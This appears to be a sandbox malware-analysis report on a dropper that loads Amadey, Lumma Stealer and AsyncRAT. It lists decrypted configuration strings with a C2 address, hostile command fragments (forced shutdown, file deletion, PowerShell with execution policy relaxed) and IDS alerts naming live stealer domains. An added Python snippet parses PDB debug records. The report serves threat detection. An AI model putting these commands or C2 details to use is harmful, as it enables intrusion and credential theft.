Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: " && timeout 1 && del
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: && Exit"
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: " && ren
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Powershell.exe
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: shutdown -s -t 0
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: random
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: 7707
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: 159.100.19.137
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: 0.5.8
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: false
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: yBu0GW2G5zAc
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: 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
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: false
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: null
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: false
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | String decryptor: Default

Exploits

Source: Yara match | File source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.22377836357.0000000000413000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match | File source: 00000032.00000002.22773040664.0000000000413000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY

Phishing

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, type: DROPPED
Source: QkRFz2sau5.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49783 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49787 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.204.173.220:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49823 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49824 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49828 version: TLS 1.2
                                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 935372fb1f.exe, 00000010.00000002.22377836357.0000000000410000.00000040.00000001.01000000.00000013.sdmp, 935372fb1f.exe, 00000010.00000003.22357417975.0000000004A0F000.00000004.00001000.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22773040664.0000000000410000.00000040.00000001.01000000.0000001E.sdmp, c7f37422c5.exe, 00000032.00000003.22752671703.00000000049FF000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdbH^ source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdb source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.8\Bot\LiteHTTP\obj\x86\Debug\SystemHelper.pdb source: skotes.exe, 0000000E.00000002.23301841769.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdbGCTL source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: em.pdb source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdb source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: .pdbTw source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Battery.pdb source: f8e8a2d2f0.exe, 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp
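The .pdb strings above come out of a printable-string sweep over the memory dumps, which is why one of them reads "Bedroom.pdbH^": the sweep keeps going past the path until it hits a non-printable byte. The debug directory itself stores the path in a CodeView RSDS record, which is NUL-terminated and also carries the PDB GUID and age, so a record-aware scan recovers the exact path plus the symbol-server key. The Python below is an added example, not part of the Joe Sandbox report: the paths in its constructed sample blob are the ones listed above, while the GUIDs, ages and filler bytes are made up, and the "synthetic versus developer path" classifier is a heuristic of this example, not a report signature.

```python
"""Recover PDB paths from a memory blob via CodeView RSDS records and compare
with what a plain printable-string sweep returns.

Added example, not part of the Joe Sandbox report.  SAMPLE_BLOB is constructed:
the PDB paths are the ones the report lists; GUIDs, ages and filler bytes are
invented, and classify_pdb_path() is a heuristic of this example."""
import re
import struct
import uuid

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
DEV_MARKERS = {"users", "obj", "debug", "release", "src", "source", "projects", "repos"}


def make_rsds(guid_bytes, age, path):
    """CV_INFO_PDB70 layout: 'RSDS' + GUID(16, Windows byte order) + age(u32 LE) + NUL-terminated path."""
    return b"RSDS" + guid_bytes + struct.pack("<I", age) + path + b"\0"


# Constructed sample: two RSDS records plus one bare string that is not a debug
# record; its trailing "H^" mimics the "Bedroom.pdbH^" string in the report.
SAMPLE_BLOB = (
    b"\x90" * 8
    + make_rsds(bytes(range(1, 17)), 1, rb"c:\omtnkdoj\bnwv\yogisfk\cqf.pdb")
    + b"\x00" * 16
    + make_rsds(bytes(range(0x80, 0x90)), 3,
                rb"C:\Users\Badus\OneDrive\Desktop\Bot1.0.8\Bot\LiteHTTP\obj\x86\Debug\SystemHelper.pdb")
    + b"\x00" * 4 + b"Bedroom.pdbH^" + b"\x00" * 4
)


def find_rsds(blob):
    """Scan for RSDS records; the path is read exactly up to its NUL, so trailing junk never bleeds in."""
    found = []
    for m in re.finditer(rb"RSDS", blob):
        off = m.start()
        if off + 24 > len(blob):
            break
        guid = uuid.UUID(bytes_le=blob[off + 4:off + 20])
        age = struct.unpack_from("<I", blob, off + 20)[0]
        end = blob.find(b"\0", off + 24)
        if end < 0:
            continue
        path = blob[off + 24:end].decode("latin-1")
        if not path.lower().endswith(".pdb"):   # 'RSDS' inside ordinary text, not a record
            continue
        found.append({
            "offset": off, "guid": str(guid), "age": age, "path": path,
            # Symbol-server directory name: upper-case GUID hex followed by the age in hex.
            "symkey": f"{guid.hex.upper()}{age:X}",
        })
    return found


def find_pdb_strings(blob):
    """What a naive string sweep reports: every printable run containing '.pdb', junk included."""
    return [r.group().decode("latin-1") for r in PRINTABLE_RUN.finditer(blob) if b".pdb" in r.group()]


def classify_pdb_path(path):
    """Heuristic (this example's assumption, not a report signature):
    'developer' = build-tree path leaking a username or project layout,
    'synthetic' = every directory is a short all-lowercase letter run (packer-style),
    'bare'      = file name only, 'other' = anything else."""
    parts = [p for p in re.split(r"[\\/]", path) if p]
    dirs = [p for p in parts[:-1] if not re.fullmatch(r"[A-Za-z]:", p)]
    if not dirs:
        return "bare"
    if any(d.lower() in DEV_MARKERS for d in dirs):
        return "developer"
    if len(dirs) >= 3 and all(re.fullmatch(r"[a-z]{3,8}", d) for d in dirs):
        return "synthetic"
    return "other"


if __name__ == "__main__":
    for rec in find_rsds(SAMPLE_BLOB):
        print(f"{rec['offset']:#06x} age={rec['age']} {rec['symkey']} {rec['path']} "
              f"[{classify_pdb_path(rec['path'])}]")
    print("string sweep:", find_pdb_strings(SAMPLE_BLOB))
```

Run stand-alone it prints the two parsed records and the three strings the naive sweep returns. The symbol key is the directory a symbol server would use for that PDB; for a crypter-style path such as c:\omtnkdoj\bnwv\yogisfk\cqf.pdb no symbols will exist, but the GUID still clusters samples built from the same intermediate. The developer path for SystemHelper.pdb, found in skotes.exe memory, names the LiteHTTP project and matches the LiteHTTP Bot detections further down the report.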
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009CDBBE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099C2A2 FindFirstFileExW,0_2_0099C2A2
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D68EE FindFirstFileW,FindClose,0_2_009D68EE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009D698F
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD076
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD3A9
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D9642
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D979D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009D9B2B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009D5C97
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.11.20:49756 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49760 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.11.20:63898 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.11.20:49757
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49764 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49768 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49766 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49765 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49771 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49770 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49763 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49769 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49773 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059985 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cozyhomevpibes .cyou) : 192.168.11.20:63210 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49779 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49778 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49782 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.11.20:55092 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49785 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49788 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49790 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49792 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49793 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49794 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49795 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49796 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49799 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.11.20:52656 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49789 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49800 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49783 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.11.20:49802
                                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.11.20:49802
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.11.20:49808
                                Source: Network trafficSuricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.11.20:49625 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.11.20:49625 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.11.20:51600 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.11.20:60682 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49803 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.11.20:54853 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.11.20:52190 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.11.20:60518 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.11.20:54703 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.11.20:49811
